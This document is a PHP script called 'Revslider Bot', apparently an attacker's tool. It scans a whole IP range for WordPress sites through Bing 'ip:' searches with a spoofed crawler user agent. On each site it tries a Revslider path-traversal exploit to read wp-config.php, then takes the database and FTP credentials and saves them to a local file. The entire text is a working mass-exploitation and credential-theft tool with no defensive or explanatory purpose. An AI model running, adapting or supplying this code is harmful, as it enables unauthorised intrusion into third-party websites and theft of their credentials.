Revslider Bot

1. <?php
2. set_time_limit(0);
3. error_reporting(0);
4. echo "================ Revslider BOT ================\n\n";
5. echo "           AZZATSSINS CYBERSERKERS \n\n";
6. echo "================ Done ! ================\n\n";
7. echo "Server Target IP : ";
8. $ip=trim(fgets(STDIN,1024));
9. $ip = explode('.',$ip);
10. $ip = $ip[0].'.'.$ip[1].'.'.$ip[2].'.';
11. for($i=0;$i <= 255;$i++)
12. {
13. $sites = array_map("site", bing("ip:$ip.$i wordpress"));
14. $un=array_unique($sites);
15. echo "[+] Scanning -> ", $ip.$i, ""."\n";
16. echo "Found : ".count($sites)." sites\n\n";
17. foreach($un as $pok){
18. $host=findit($file,"DB_HOST', '","');");
19. $db=findit($file,"DB_NAME', '","');");
20. $us=findit($file,"DB_USER', '","');");
21. $pw=findit($file,"DB_PASSWORD', '","');");
22. $bda="http://$pok";
23.     $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
24.     $dn=($bda).($linkof);
25.     $file=@file_get_contents($dn);
26.     if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
27.     echo "[+] Scanning => ".$bda."\n\n";
28.     echo "[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
29.     echo "[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
30.     echo "[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
31.     echo "[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
32.     $db="[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
33.     $user="[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
34.     $pass="[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
35.     $host="[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
36.     $ux = "".$bda."\r\n";
37.     $ux1 = "".$db."\r\n";
38.     $ux2 = "".$user."\r\n";
39.     $ux3 = "".$pass."\r\n";
40.     $ux4 = "".$host."\r\n";
41.     $save=fopen('rev.txt','ab');
42.     fwrite($save,"$ux");
43.     fwrite($save,"$ux1");
44.     fwrite($save,"$ux2");
45.     fwrite($save,"$ux3");
46.     fwrite($save,"$ux4");
47.     }
48.     elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
49.     echo "FTP user : ".findit($file,"FTP_USER','","');")."\n\n";
50.     echo "FTP pass : ".findit($file,"FTP_PASS','","');")."\n\n";
51.     echo "FTP host : ".findit($file,"FTP_HOST','","');")."\n\n";
52.     }
53.     else{echo $bda." : Not Revslider \n\n";}
54. }
55. }
56. function findit($mytext,$starttag,$endtag) {
57.  $posLeft  = stripos($mytext,$starttag)+strlen($starttag);
58.  $posRight = stripos($mytext,$endtag,$posLeft+1);
59.  return  substr($mytext,$posLeft,$posRight-$posLeft);
60. }
61. function site($link){
62. return str_replace("","",parse_url($link, PHP_URL_HOST));
63. }
64. function bing($what){
65. for($i = 1; $i <= 2000; $i += 10){
66. $ch = curl_init();
67. curl_setopt ($ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
68. curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)");
69. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
70. curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt');
71. curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
72. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
73. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
74. $data = curl_exec($ch);
75. preg_match_all('#;a=(.*?)" h="#',$data, $links);
76. foreach($links[1] as $link){
77. $allLinks[] = $link;
78. }
79. if(!preg_match('#"sw_next"#',$data)) break;
80. }
81.  
82. if(!empty($allLinks) && is_array($allLinks)){
83. return array_unique(array_map("urldecode", $allLinks));
84. }
85. }
86. ?>